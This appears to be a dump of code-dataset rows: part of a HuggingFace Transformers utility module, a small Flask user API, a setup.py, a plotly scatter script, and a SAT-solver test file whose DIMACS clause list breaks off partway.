is_phonemizer_available,
is_protobuf_available,
is_psutil_available,
is_py3nvml_available,
is_pyctcdecode_available,
is_pytesseract_available,
is_pytorch_quantization_available,
is_rjieba_available,
is_sagemaker_dp_enabled,
is_sagemaker_mp_enabled,
is_scatter_available,
is_scipy_available,
is_sentencepiece_available,
is_sklearn_available,
is_soundfile_availble,
is_spacy_available,
is_speech_available,
is_tensorflow_probability_available,
is_tf2onnx_available,
is_tf_available,
is_timm_available,
is_tokenizers_available,
is_torch_available,
is_torch_bf16_available,
is_torch_cuda_available,
is_torch_fx_available,
is_torch_fx_proxy,
is_torch_onnx_dict_inputs_support_available,
is_torch_tf32_available,
is_torch_tpu_available,
is_torchaudio_available,
is_torchdynamo_available,
is_training_run_on_sagemaker,
is_vision_available,
requires_backends,
tf_required,
torch_only_method,
torch_required,
torch_version,
)
WEIGHTS_NAME = "pytorch_model.bin"
WEIGHTS_INDEX_NAME = "pytorch_model.bin.index.json"
TF2_WEIGHTS_NAME = "tf_model.h5"
TF_WEIGHTS_NAME = "model.ckpt"
FLAX_WEIGHTS_NAME = "flax_model.msgpack"
CONFIG_NAME = "config.json"
FEATURE_EXTRACTOR_NAME = "preprocessor_config.json"
MODEL_CARD_NAME = "modelcard.json"
SENTENCEPIECE_UNDERLINE = "▁"
SPIECE_UNDERLINE = SENTENCEPIECE_UNDERLINE # Kept for backward compatibility
MULTIPLE_CHOICE_DUMMY_INPUTS = [
[[0, 1, 0, 1], [1, 0, 0, 1]]
] * 2 # Needs to have 0s and 1s only since XLM uses it for langs too.
DUMMY_INPUTS = [[7, 6, 0, 0, 1], [1, 2, 3, 0, 0], [0, 0, 0, 4, 5]]
DUMMY_MASK = [[1, 1, 1, 1, 1], [1, 1, 1, 0, 0], [0, 0, 0, 1, 1]]
def check_min_version(min_version):
if version.parse(__version__) < version.parse(min_version):
if "dev" in min_version:
error_message = (
"This example requires a source install from HuggingFace Transformers (see "
"`https://huggingface.co/transformers/installation.html#installing-from-source`),"
)
else:
error_message = f"This example requires a minimum version of {min_version},"
error_message += f" but the version found is {__version__}.\n"
raise ImportError(
error_message
+ "Check out https://huggingface.co/transformers/examples.html for the examples corresponding to other "
"versions of HuggingFace Transformers."
)
| en | 0.848802 | #!/usr/bin/env python # coding=utf-8 # flake8: noqa # There's no way to ignore "F401 '...' imported but unused" warnings in this # module, but to preserve other warnings. So, don't check this module at all. # Copyright 2021 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Kept for backward compatibility # Needs to have 0s and 1s only since XLM uses it for langs too. #installing-from-source`)," | 1.291974 | 1 |
app/modules/api/user/user.py | FannyFirst/BunShop-flask | 0 | 6632500 | <reponame>FannyFirst/BunShop-flask
from flask_restplus import Namespace, Resource
from flask import request
from app.modules.dao.user.user import User
from app.extensions.response import *
api = Namespace("User", "user api", "/user")
DAO = User()
@api.route("/")
class UserList(Resource):
def get(self):
return response(DAO.list())
# @api.route("/<int:_id>")
# class User(Resource):
#
# def get(self, _id):
# return response(DAO.get(_id))
#
# # @api.param("name", "user name")
# # def put(self, _id):
# # name = request.args.get("name")
# # if name is None:
# # return response(code=BaseResponse.PARAM_NOT_ALLOW)
# # return response(DAO.update(_id, name))
#
# def delete(self, _id):
# return response(DAO.status(_id))
@api.route("/login")
class UserAuth(Resource):
def post(self):
_id = request.args.get("id")
if _id is not None:
try:
_id = int(_id)
except ValueError:
return response(BaseResponse.PARAM_TYPE_NOT_ALLOW)
user = DAO.get(_id)
if user != -1:
return response(_id)
return response(DAO.create())
| from flask_restplus import Namespace, Resource
from flask import request
from app.modules.dao.user.user import User
from app.extensions.response import *
api = Namespace("User", "user api", "/user")
DAO = User()
@api.route("/")
class UserList(Resource):
def get(self):
return response(DAO.list())
# @api.route("/<int:_id>")
# class User(Resource):
#
# def get(self, _id):
# return response(DAO.get(_id))
#
# # @api.param("name", "user name")
# # def put(self, _id):
# # name = request.args.get("name")
# # if name is None:
# # return response(code=BaseResponse.PARAM_NOT_ALLOW)
# # return response(DAO.update(_id, name))
#
# def delete(self, _id):
# return response(DAO.status(_id))
@api.route("/login")
class UserAuth(Resource):
def post(self):
_id = request.args.get("id")
if _id is not None:
try:
_id = int(_id)
except ValueError:
return response(BaseResponse.PARAM_TYPE_NOT_ALLOW)
user = DAO.get(_id)
if user != -1:
return response(_id)
return response(DAO.create()) | en | 0.323865 | # @api.route("/<int:_id>") # class User(Resource): # # def get(self, _id): # return response(DAO.get(_id)) # # # @api.param("name", "user name") # # def put(self, _id): # # name = request.args.get("name") # # if name is None: # # return response(code=BaseResponse.PARAM_NOT_ALLOW) # # return response(DAO.update(_id, name)) # # def delete(self, _id): # return response(DAO.status(_id)) | 2.715583 | 3 |
setup.py | kokron/anzu | 6 | 6632501 | <filename>setup.py
from setuptools import setup, find_packages
setup(
name='anzu',
version='1.0',
packages=find_packages(),
package_dir={'anzu' : 'anzu'},
package_data={'anzu': ['data/*']},
long_description=open('README.md').read(),
)
| <filename>setup.py
from setuptools import setup, find_packages
setup(
name='anzu',
version='1.0',
packages=find_packages(),
package_dir={'anzu' : 'anzu'},
package_data={'anzu': ['data/*']},
long_description=open('README.md').read(),
)
| none | 1 | 1.391882 | 1 |
|
csv files/scatter.py | hriday-wpo8a/c103 | 0 | 6632502 | <filename>csv files/scatter.py
import pandas as pd
import plotly.express as px
df=pd.read_csv("data.csv")
fig = px.scatter(df,x="Population",y="Per capita",size="Percentage",color="Country",size_max = 60)
fig.show() | <filename>csv files/scatter.py
import pandas as pd
import plotly.express as px
df=pd.read_csv("data.csv")
fig = px.scatter(df,x="Population",y="Per capita",size="Percentage",color="Country",size_max = 60)
fig.show() | none | 1 | 3.712196 | 4 |
|
tests/sat/Intensive/c890.200.UNSAT.dimacs.test.py | bernardocuteri/wasp | 19 | 6632503 | <filename>tests/sat/Intensive/c890.200.UNSAT.dimacs.test.py
input = """
c num blocks = 1
c num vars = 200
c minblockids[0] = 1
c maxblockids[0] = 200
p cnf 200 890
-80 -16 -14 0
-14 -200 -190 0
61 -149 133 0
-86 -126 -9 0
11 -79 -15 0
-119 -191 -174 0
-154 -29 -134 0
-78 -118 76 0
-106 119 173 0
131 -140 -141 0
64 18 -147 0
-132 -12 158 0
122 -143 -117 0
-5 80 -128 0
-113 -108 -171 0
62 -134 -159 0
63 118 12 0
-127 -98 41 0
-190 172 -182 0
153 -77 143 0
-142 138 53 0
-70 -125 -160 0
120 195 108 0
-177 -184 -106 0
-168 175 160 0
-153 -84 -96 0
-42 133 190 0
-24 -78 -162 0
5 -105 73 0
105 19 -130 0
151 -142 -95 0
86 -156 173 0
180 172 98 0
186 130 65 0
-84 126 -57 0
-88 8 -126 0
43 -172 -185 0
-99 149 -83 0
13 61 169 0
197 -56 -142 0
98 73 118 0
-124 9 -90 0
150 29 72 0
13 -59 183 0
-7 23 78 0
67 1 -158 0
-151 142 -35 0
-62 198 -99 0
-43 -111 157 0
-197 -193 -141 0
-179 5 -50 0
105 74 134 0
-86 12 33 0
71 -151 88 0
-119 11 -48 0
-133 158 53 0
196 -64 -199 0
186 42 -105 0
-137 189 139 0
-95 46 3 0
-160 -41 -176 0
-12 -173 20 0
146 149 21 0
-174 -103 164 0
-21 -96 145 0
-191 137 97 0
32 -183 180 0
-130 78 59 0
-5 157 166 0
167 -112 -179 0
-10 107 -161 0
54 -34 93 0
-138 47 -193 0
-42 -8 159 0
-84 35 93 0
-182 -100 32 0
-50 101 63 0
23 22 167 0
-21 -77 134 0
111 -107 159 0
-77 -7 114 0
40 41 -166 0
165 -21 15 0
-100 166 80 0
-118 162 -180 0
-190 62 -159 0
-72 113 -2 0
-110 167 -45 0
-79 -143 138 0
172 126 32 0
-117 43 -102 0
-12 81 -58 0
54 191 171 0
-161 -103 -126 0
99 28 143 0
138 111 -42 0
112 95 -88 0
167 -95 140 0
87 -150 105 0
-39 65 -81 0
-115 145 104 0
-118 22 3 0
63 -16 197 0
128 -153 -100 0
-139 5 -166 0
37 68 171 0
82 9 -125 0
191 -59 77 0
71 82 -2 0
-8 134 74 0
-32 -44 165 0
-101 114 -131 0
51 199 -46 0
110 -90 -6 0
-187 -21 -139 0
-154 12 -140 0
-139 -123 195 0
-41 -157 -58 0
25 -137 -52 0
61 -38 -57 0
-172 131 126 0
-104 90 -142 0
44 -198 179 0
16 -82 87 0
-134 14 48 0
-163 -64 24 0
-138 -127 -141 0
-51 -180 -54 0
-23 90 102 0
174 -118 -134 0
131 -69 -92 0
76 -111 -19 0
96 -72 151 0
42 -47 122 0
-99 -107 -17 0
-39 97 198 0
-111 159 66 0
133 -176 -30 0
-16 -58 87 0
-42 32 -94 0
-199 184 -146 0
-106 -7 -94 0
79 126 -185 0
-152 151 -13 0
-69 -184 25 0
-128 131 182 0
-192 29 -74 0
31 -177 -21 0
-123 30 -132 0
53 13 38 0
-3 185 -77 0
-167 -98 71 0
155 58 -90 0
143 -189 -174 0
91 110 -116 0
181 -157 19 0
-26 189 151 0
-63 167 2 0
-60 113 -57 0
64 -25 180 0
15 -12 97 0
-145 136 124 0
11 -73 -107 0
-135 -86 -73 0
-53 -166 -11 0
105 187 -102 0
22 1 -26 0
-12 142 -167 0
123 107 174 0
-26 -128 -162 0
-118 -74 133 0
95 -144 54 0
-1 -165 -188 0
-113 154 -175 0
92 -59 98 0
-111 70 -128 0
3 -21 89 0
87 -195 142 0
93 -144 -90 0
177 -120 52 0
169 141 -5 0
75 -10 -192 0
-33 -22 -66 0
6 183 196 0
-143 146 73 0
-168 124 -139 0
15 -17 124 0
-65 184 -82 0
-148 -100 -141 0
72 64 -10 0
-190 1 -150 0
2 -17 -96 0
-4 -160 105 0
-100 -122 -23 0
-102 22 -128 0
-139 181 102 0
-8 -105 120 0
-141 159 -174 0
112 124 122 0
-66 -167 131 0
155 -176 -27 0
44 -124 -103 0
-162 -142 63 0
46 -158 136 0
187 12 -90 0
-91 136 -24 0
147 130 -33 0
64 32 56 0
-54 -10 -179 0
-127 -132 -74 0
-123 -15 120 0
161 80 60 0
-72 116 113 0
85 -39 -160 0
12 125 -135 0
-20 -15 -195 0
109 -114 -185 0
115 -185 200 0
-90 -142 -80 0
19 -94 43 0
24 43 -57 0
-50 69 15 0
-117 -133 84 0
-163 -85 -35 0
91 70 175 0
-10 -20 127 0
144 40 -184 0
-104 -36 21 0
-122 131 18 0
59 115 16 0
154 -14 -8 0
-182 -105 20 0
198 -30 56 0
-57 -176 97 0
45 -195 191 0
55 193 -31 0
54 67 15 0
146 136 119 0
164 36 -100 0
4 -197 139 0
187 189 144 0
-183 36 154 0
47 173 -159 0
93 -78 -146 0
-170 9 131 0
-174 -186 38 0
102 29 -63 0
46 137 -138 0
-192 54 -17 0
-108 -54 5 0
-144 111 68 0
133 -69 35 0
30 -28 66 0
-62 156 31 0
157 -32 95 0
-73 21 144 0
-14 172 -30 0
-15 143 -107 0
-70 86 141 0
77 192 144 0
-80 -94 133 0
95 17 -148 0
66 15 159 0
-136 -58 62 0
75 -21 191 0
161 -12 175 0
-42 -117 -18 0
-192 147 -1 0
-28 -137 -151 0
41 17 146 0
-186 -182 105 0
-44 102 85 0
183 29 32 0
-84 32 167 0
21 -197 -172 0
-142 19 54 0
-107 -173 -143 0
-24 165 79 0
-138 -17 75 0
-93 -108 178 0
-104 77 138 0
-164 37 -97 0
51 55 -171 0
70 103 -191 0
-161 46 -13 0
-123 6 173 0
4 73 -60 0
-170 -114 -56 0
-179 -191 -172 0
149 145 43 0
-118 91 -51 0
-12 152 167 0
-196 -162 -9 0
-38 -17 -110 0
-96 -5 -36 0
97 109 -191 0
-89 -38 31 0
70 -184 94 0
-144 -146 11 0
-32 104 144 0
136 -163 -14 0
51 -4 -12 0
66 48 -153 0
-44 -10 8 0
54 106 102 0
5 58 78 0
-142 170 83 0
39 -173 -175 0
196 -149 104 0
160 4 44 0
-101 36 -50 0
-86 -62 -163 0
-85 -49 -169 0
-97 -145 93 0
147 35 38 0
13 28 -30 0
-64 -175 18 0
-144 129 33 0
-149 -158 -21 0
-152 -22 -92 0
-23 90 -111 0
189 -176 -65 0
-107 -94 -146 0
113 106 45 0
186 -47 -115 0
141 -4 -142 0
-93 -5 46 0
-183 -191 -187 0
18 12 168 0
-14 -30 177 0
-50 104 15 0
178 -165 -6 0
-55 7 -179 0
-77 -7 -135 0
28 106 -134 0
-138 -159 -192 0
-83 1 164 0
33 39 91 0
107 -170 72 0
179 -115 69 0
139 179 -88 0
99 68 154 0
-175 26 130 0
174 159 -134 0
-73 -182 -191 0
10 -28 16 0
119 36 -103 0
-35 51 -17 0
-197 -58 -185 0
-149 -155 166 0
-104 -155 -140 0
-48 -194 47 0
6 4 170 0
-51 189 -59 0
67 9 92 0
111 -149 -144 0
-17 -65 75 0
6 166 17 0
-55 -124 61 0
62 -175 77 0
46 81 -170 0
-158 159 -153 0
108 34 -31 0
118 133 1 0
137 -105 -63 0
138 51 -142 0
27 -57 -103 0
106 -158 -55 0
-180 -139 -199 0
-15 -151 182 0
24 -97 40 0
-152 -59 -85 0
-159 39 124 0
-157 55 -126 0
67 -140 36 0
109 -167 -187 0
51 189 -12 0
30 110 -190 0
-120 -3 -133 0
1 -81 -174 0
170 -77 123 0
-16 -64 48 0
51 9 -122 0
197 -90 76 0
-184 144 -156 0
-146 26 -186 0
44 -114 13 0
192 24 170 0
-14 144 177 0
-116 -45 189 0
-163 93 -78 0
-177 -196 -51 0
-165 104 4 0
140 -21 138 0
69 182 33 0
132 -54 183 0
16 -58 183 0
13 -132 -166 0
146 54 94 0
-156 -162 98 0
-60 -54 -145 0
-186 126 -75 0
-85 -3 148 0
190 -162 -6 0
-115 -30 32 0
-182 -113 22 0
21 -121 73 0
55 -82 87 0
-148 -36 182 0
-178 96 -183 0
-163 -179 43 0
-161 120 135 0
114 46 176 0
143 -79 -165 0
-32 60 100 0
18 -21 135 0
-140 173 127 0
-117 129 -102 0
110 -127 80 0
-91 61 200 0
-79 -168 198 0
144 -90 27 0
188 -196 -190 0
-5 -26 58 0
11 43 -195 0
-17 83 5 0
154 -72 17 0
-77 -167 -67 0
-33 60 68 0
-137 -37 22 0
69 54 -80 0
119 -141 -73 0
124 -193 -81 0
123 164 -94 0
-179 119 51 0
21 -84 -72 0
146 -8 -50 0
-200 198 190 0
-138 161 68 0
-139 134 -58 0
-121 85 -133 0
-5 -186 71 0
-188 -106 184 0
122 -3 10 0
1 144 -85 0
-117 19 -123 0
-158 23 -90 0
96 -125 -141 0
-25 136 40 0
134 -81 -76 0
84 -167 -99 0
141 -110 -115 0
-95 98 -73 0
-151 31 -183 0
168 -44 -129 0
162 32 -111 0
-10 106 164 0
-46 -117 -163 0
-10 -39 162 0
54 -139 -119 0
73 -67 173 0
67 92 -64 0
-84 51 194 0
61 -74 -41 0
-61 -24 57 0
186 -27 82 0
-156 41 -127 0
102 -179 89 0
-71 155 33 0
61 -68 55 0
193 -78 57 0
6 -120 -110 0
-103 -52 5 0
-54 184 -62 0
-115 -39 -174 0
58 196 152 0
-152 -3 -142 0
1 -83 142 0
-77 24 -131 0
123 122 -2 0
-41 -147 -163 0
102 -60 -84 0
-118 70 193 0
-44 -156 23 0
-8 147 -114 0
93 115 -72 0
125 -158 -148 0
-151 -28 -71 0
151 -75 -65 0
-186 -41 193 0
-141 -119 -147 0
-196 51 31 0
-119 164 19 0
51 -40 101 0
94 -171 -175 0
120 130 -84 0
-74 -64 -150 0
-133 72 78 0
-45 118 105 0
67 164 -137 0
-176 -89 -158 0
-168 80 12 0
167 -168 -8 0
182 84 7 0
-13 165 -124 0
95 -187 -193 0
184 -91 80 0
-15 -35 -71 0
-9 137 68 0
76 -75 -87 0
-59 -120 -154 0
-131 8 55 0
43 -89 -108 0
89 148 56 0
-166 -9 42 0
-192 -95 133 0
195 -182 -124 0
-29 199 -3 0
-11 -186 -8 0
195 -110 65 0
-12 167 85 0
-41 50 117 0
-192 11 -181 0
86 -194 -165 0
-29 -111 93 0
122 5 -92 0
13 -79 108 0
-89 184 95 0
-142 -127 66 0
-110 81 104 0
-154 -44 9 0
-159 -143 -12 0
120 14 -8 0
-114 102 -172 0
22 149 -108 0
-151 -152 -20 0
-101 -22 110 0
-43 -115 176 0
68 -61 51 0
105 -63 -112 0
177 -179 185 0
113 39 -111 0
138 -115 133 0
-153 -91 -52 0
-189 -22 -49 0
-195 -20 30 0
-45 89 137 0
-199 126 143 0
194 147 7 0
35 53 -50 0
-194 -87 116 0
-73 70 -83 0
145 -129 54 0
-195 -127 -16 0
-174 -20 128 0
-40 -172 120 0
195 -97 184 0
-51 155 63 0
91 168 -176 0
-193 167 1 0
153 35 83 0
122 145 185 0
-31 87 -64 0
1 21 53 0
37 -169 120 0
130 -48 -86 0
-27 -34 79 0
-61 181 -57 0
12 68 -4 0
-66 198 -99 0
-110 50 -66 0
-88 -26 -74 0
-35 64 187 0
-78 -197 190 0
191 -137 47 0
75 -18 63 0
190 166 72 0
98 -120 -88 0
-163 -14 140 0
-144 -149 -86 0
114 146 -69 0
-179 182 144 0
98 -186 -46 0
16 3 -166 0
-196 88 -150 0
190 35 166 0
-191 178 18 0
195 -111 41 0
-63 190 184 0
119 159 28 0
-167 -125 6 0
-173 49 -147 0
-174 -82 -129 0
-24 -16 -53 0
-79 -122 -64 0
-119 190 -129 0
-29 -106 -152 0
22 -110 143 0
-45 54 40 0
-155 -103 -2 0
-195 -139 131 0
145 -48 -64 0
115 -181 79 0
-190 145 -5 0
-92 164 -47 0
-75 127 -169 0
-10 -100 193 0
-129 37 -167 0
106 20 172 0
-43 -40 -129 0
-7 107 -133 0
-73 -84 161 0
-78 94 80 0
4 -129 149 0
-47 58 118 0
-120 116 -155 0
-100 -87 78 0
106 141 190 0
-15 22 86 0
187 174 -90 0
61 -21 -153 0
-12 -200 -95 0
-85 -158 114 0
-15 -172 150 0
54 -36 96 0
122 35 95 0
185 149 -68 0
-138 46 -56 0
115 39 -119 0
-83 -131 -12 0
92 157 192 0
-33 107 -198 0
122 182 -7 0
-71 65 63 0
107 -178 46 0
166 3 87 0
-52 18 -131 0
-138 -196 -48 0
-128 -37 50 0
125 -194 -101 0
-36 20 23 0
-6 -127 -2 0
103 -137 -60 0
86 77 117 0
200 171 -16 0
91 -5 -48 0
115 -2 85 0
151 -55 41 0
-46 -1 171 0
164 173 -105 0
15 46 -126 0
-161 117 107 0
140 84 -49 0
-167 194 77 0
136 71 -70 0
196 75 47 0
54 103 126 0
-77 159 -147 0
21 18 108 0
172 31 85 0
180 -44 -198 0
42 -122 39 0
179 -52 -106 0
79 146 -105 0
-120 156 69 0
15 -153 -10 0
-118 -113 -33 0
-129 56 34 0
-8 -199 73 0
-103 -133 147 0
-177 -42 54 0
162 -168 55 0
17 -107 -34 0
-62 -149 -199 0
168 -93 135 0
74 128 62 0
117 158 188 0
-139 -164 -118 0
62 29 57 0
86 -28 124 0
-198 -51 -68 0
-139 -113 -98 0
23 -98 -171 0
-121 -139 -53 0
-138 -92 67 0
-146 3 -103 0
-190 126 83 0
131 -87 21 0
117 107 -69 0
16 183 -4 0
150 -200 -18 0
179 -184 -193 0
108 -7 -178 0
-112 27 97 0
37 -61 13 0
188 82 101 0
-4 -124 -46 0
53 188 74 0
-14 129 194 0
25 60 94 0
-190 -5 119 0
-54 11 -166 0
-102 -77 158 0
91 -20 -102 0
160 58 46 0
124 -164 -147 0
65 -38 -157 0
91 -86 122 0
-191 69 -167 0
-172 -138 118 0
-52 61 145 0
-31 41 -4 0
-77 -38 33 0
-97 162 -26 0
-121 25 153 0
68 -48 142 0
130 65 50 0
-103 115 177 0
-56 126 158 0
99 162 -171 0
6 168 -55 0
34 -61 77 0
-23 158 -101 0
127 136 20 0
146 180 106 0
130 32 -173 0
13 169 198 0
-108 59 -42 0
87 -162 173 0
196 173 157 0
12 186 -135 0
-60 117 177 0
-22 -96 -27 0
-116 -94 141 0
-137 -170 164 0
-110 106 -13 0
35 -118 106 0
-167 190 45 0
127 -187 -196 0
-50 41 -132 0
143 121 169 0
-62 -69 -68 0
-60 198 -18 0
-62 58 -158 0
135 10 -68 0
-145 -10 -36 0
-187 -91 131 0
195 84 36 0
-181 50 -79 0
12 61 -14 0
139 -30 -123 0
-51 -184 39 0
-37 23 18 0
191 -120 156 0
83 103 124 0
-171 199 156 0
-41 64 -157 0
-181 162 199 0
8 -158 -160 0
-21 -37 163 0
42 137 190 0
-123 -70 50 0
9 127 187 0
16 169 -114 0
179 142 28 0
7 147 191 0
48 -58 -198 0
-118 -10 185 0
57 -107 -106 0
65 96 173 0
54 64 66 0
-160 193 -101 0
199 65 -76 0
-141 138 157 0
81 102 163 0
180 -132 -134 0
154 5 175 0
-120 42 -64 0
109 -143 88 0
75 71 77 0
-19 -10 -123 0
12 45 71 0
127 -158 199 0
98 -198 120 0
-116 129 166 0
124 -186 -34 0
-63 -140 195 0
-162 172 19 0
190 107 76 0
-108 -193 -24 0
-54 -148 -132 0
158 184 83 0
-75 -4 101 0
49 96 17 0
-19 104 -73 0
197 159 101 0
172 196 3 0
-132 192 -120 0
-151 -92 -200 0
-147 -128 -179 0
89 188 191 0
-152 -102 -175 0
177 -133 -127 0
-69 -80 -154 0
160 -122 -67 0
117 95 31 0
187 -114 55 0
-52 102 -18 0
-34 -111 -131 0
70 93 -152 0
-72 -58 -60 0
-151 196 -59 0
12 -159 -1 0
-173 133 167 0
198 61 166 0
-188 94 8 0
-156 39 -2 0
184 -151 -89 0
-112 -160 -144 0
156 35 123 0
27 -84 105 0
-166 -50 157 0
-168 -26 179 0
74 96 94 0
199 195 178 0
114 -27 144 0
48 105 53 0
128 -117 -34 0
-28 -109 -159 0
197 40 23 0
142 20 -42 0
-21 103 -12 0
122 -31 40 0
-24 -10 -57 0
110 -123 72 0
114 20 -160 0
-14 94 -121 0
-31 195 -163 0
-98 -45 143 0
-110 -3 -195 0
142 86 -186 0
194 -125 28 0
-60 129 -180 0
134 141 197 0
-92 -68 30 0
182 6 96 0
146 -195 14 0
-78 -56 -61 0
-78 139 144 0
-190 -48 -163 0
-19 -40 -181 0
-92 -191 25 0
-156 122 38 0
195 13 -190 0
99 -57 -184 0
141 -124 -113 0
-81 38 40 0
68 199 -12 0
-178 -118 -20 0
-188 183 -96 0
190 144 121 0
43 -111 40 0
-10 -39 -68 0
-42 -17 83 0
-135 -101 -82 0
-153 198 -23 0
-188 -86 146 0
-26 -126 -89 0
-113 135 93 0
-161 20 -162 0
165 1 106 0
-159 -27 79 0
78 -60 184 0
79 -53 -166 0
106 170 -55 0
-19 -30 90 0
-152 176 56 0
-108 91 -50 0
-104 100 -171 0
85 -197 -93 0
99 106 12 0
20 -108 -103 0
-142 -92 137 0
70 75 -10 0
30 51 -129 0
-132 -38 63 0
-59 66 48 0
-88 -118 43 0
-71 200 -182 0
6 -177 -172 0
"""
output = "UNSAT"
| <filename>tests/sat/Intensive/c890.200.UNSAT.dimacs.test.py
input = """
c num blocks = 1
c num vars = 200
c minblockids[0] = 1
c maxblockids[0] = 200
p cnf 200 890
-80 -16 -14 0
-14 -200 -190 0
61 -149 133 0
-86 -126 -9 0
11 -79 -15 0
-119 -191 -174 0
-154 -29 -134 0
-78 -118 76 0
-106 119 173 0
131 -140 -141 0
64 18 -147 0
-132 -12 158 0
122 -143 -117 0
-5 80 -128 0
-113 -108 -171 0
62 -134 -159 0
63 118 12 0
-127 -98 41 0
-190 172 -182 0
153 -77 143 0
-142 138 53 0
-70 -125 -160 0
120 195 108 0
-177 -184 -106 0
-168 175 160 0
-153 -84 -96 0
-42 133 190 0
-24 -78 -162 0
5 -105 73 0
105 19 -130 0
151 -142 -95 0
86 -156 173 0
180 172 98 0
186 130 65 0
-84 126 -57 0
-88 8 -126 0
43 -172 -185 0
-99 149 -83 0
13 61 169 0
197 -56 -142 0
98 73 118 0
-124 9 -90 0
150 29 72 0
13 -59 183 0
-7 23 78 0
67 1 -158 0
-151 142 -35 0
-62 198 -99 0
-43 -111 157 0
-197 -193 -141 0
-179 5 -50 0
105 74 134 0
-86 12 33 0
71 -151 88 0
-119 11 -48 0
-133 158 53 0
196 -64 -199 0
186 42 -105 0
-137 189 139 0
-95 46 3 0
-160 -41 -176 0
-12 -173 20 0
146 149 21 0
-174 -103 164 0
-21 -96 145 0
-191 137 97 0
32 -183 180 0
-130 78 59 0
-5 157 166 0
167 -112 -179 0
-10 107 -161 0
54 -34 93 0
-138 47 -193 0
-42 -8 159 0
-84 35 93 0
-182 -100 32 0
-50 101 63 0
23 22 167 0
-21 -77 134 0
111 -107 159 0
-77 -7 114 0
40 41 -166 0
165 -21 15 0
-100 166 80 0
-118 162 -180 0
-190 62 -159 0
-72 113 -2 0
-110 167 -45 0
-79 -143 138 0
172 126 32 0
-117 43 -102 0
-12 81 -58 0
54 191 171 0
-161 -103 -126 0
99 28 143 0
138 111 -42 0
112 95 -88 0
167 -95 140 0
87 -150 105 0
-39 65 -81 0
-115 145 104 0
-118 22 3 0
63 -16 197 0
128 -153 -100 0
-139 5 -166 0
37 68 171 0
82 9 -125 0
191 -59 77 0
71 82 -2 0
-8 134 74 0
-32 -44 165 0
-101 114 -131 0
51 199 -46 0
110 -90 -6 0
-187 -21 -139 0
-154 12 -140 0
-139 -123 195 0
-41 -157 -58 0
25 -137 -52 0
61 -38 -57 0
-172 131 126 0
-104 90 -142 0
44 -198 179 0
16 -82 87 0
-134 14 48 0
-163 -64 24 0
-138 -127 -141 0
-51 -180 -54 0
-23 90 102 0
174 -118 -134 0
131 -69 -92 0
76 -111 -19 0
96 -72 151 0
42 -47 122 0
-99 -107 -17 0
-39 97 198 0
-111 159 66 0
133 -176 -30 0
-16 -58 87 0
-42 32 -94 0
-199 184 -146 0
-106 -7 -94 0
79 126 -185 0
-152 151 -13 0
-69 -184 25 0
-128 131 182 0
-192 29 -74 0
31 -177 -21 0
-123 30 -132 0
53 13 38 0
-3 185 -77 0
-167 -98 71 0
155 58 -90 0
143 -189 -174 0
91 110 -116 0
181 -157 19 0
-26 189 151 0
-63 167 2 0
-60 113 -57 0
64 -25 180 0
15 -12 97 0
-145 136 124 0
11 -73 -107 0
-135 -86 -73 0
-53 -166 -11 0
105 187 -102 0
22 1 -26 0
-12 142 -167 0
123 107 174 0
-26 -128 -162 0
-118 -74 133 0
95 -144 54 0
-1 -165 -188 0
-113 154 -175 0
92 -59 98 0
-111 70 -128 0
3 -21 89 0
87 -195 142 0
93 -144 -90 0
177 -120 52 0
169 141 -5 0
75 -10 -192 0
-33 -22 -66 0
6 183 196 0
-143 146 73 0
-168 124 -139 0
15 -17 124 0
-65 184 -82 0
-148 -100 -141 0
72 64 -10 0
-190 1 -150 0
2 -17 -96 0
-4 -160 105 0
-100 -122 -23 0
-102 22 -128 0
-139 181 102 0
-8 -105 120 0
-141 159 -174 0
112 124 122 0
-66 -167 131 0
155 -176 -27 0
44 -124 -103 0
-162 -142 63 0
46 -158 136 0
187 12 -90 0
-91 136 -24 0
147 130 -33 0
64 32 56 0
-54 -10 -179 0
-127 -132 -74 0
-123 -15 120 0
161 80 60 0
-72 116 113 0
85 -39 -160 0
12 125 -135 0
-20 -15 -195 0
109 -114 -185 0
115 -185 200 0
-90 -142 -80 0
19 -94 43 0
24 43 -57 0
-50 69 15 0
-117 -133 84 0
-163 -85 -35 0
91 70 175 0
-10 -20 127 0
144 40 -184 0
-104 -36 21 0
-122 131 18 0
59 115 16 0
154 -14 -8 0
-182 -105 20 0
198 -30 56 0
-57 -176 97 0
45 -195 191 0
55 193 -31 0
54 67 15 0
146 136 119 0
164 36 -100 0
4 -197 139 0
187 189 144 0
-183 36 154 0
47 173 -159 0
93 -78 -146 0
-170 9 131 0
-174 -186 38 0
102 29 -63 0
46 137 -138 0
-192 54 -17 0
-108 -54 5 0
-144 111 68 0
133 -69 35 0
30 -28 66 0
-62 156 31 0
157 -32 95 0
-73 21 144 0
-14 172 -30 0
-15 143 -107 0
-70 86 141 0
77 192 144 0
-80 -94 133 0
95 17 -148 0
66 15 159 0
-136 -58 62 0
75 -21 191 0
161 -12 175 0
-42 -117 -18 0
-192 147 -1 0
-28 -137 -151 0
41 17 146 0
-186 -182 105 0
-44 102 85 0
183 29 32 0
-84 32 167 0
21 -197 -172 0
-142 19 54 0
-107 -173 -143 0
-24 165 79 0
-138 -17 75 0
-93 -108 178 0
-104 77 138 0
-164 37 -97 0
51 55 -171 0
70 103 -191 0
-161 46 -13 0
-123 6 173 0
4 73 -60 0
-170 -114 -56 0
-179 -191 -172 0
149 145 43 0
-118 91 -51 0
-12 152 167 0
-196 -162 -9 0
-38 -17 -110 0
-96 -5 -36 0
97 109 -191 0
-89 -38 31 0
70 -184 94 0
-144 -146 11 0
-32 104 144 0
136 -163 -14 0
51 -4 -12 0
66 48 -153 0
-44 -10 8 0
54 106 102 0
5 58 78 0
-142 170 83 0
39 -173 -175 0
196 -149 104 0
160 4 44 0
-101 36 -50 0
-86 -62 -163 0
-85 -49 -169 0
-97 -145 93 0
147 35 38 0
13 28 -30 0
-64 -175 18 0
-144 129 33 0
-149 -158 -21 0
-152 -22 -92 0
-23 90 -111 0
189 -176 -65 0
-107 -94 -146 0
113 106 45 0
186 -47 -115 0
141 -4 -142 0
-93 -5 46 0
-183 -191 -187 0
18 12 168 0
-14 -30 177 0
-50 104 15 0
178 -165 -6 0
-55 7 -179 0
-77 -7 -135 0
28 106 -134 0
-138 -159 -192 0
-83 1 164 0
33 39 91 0
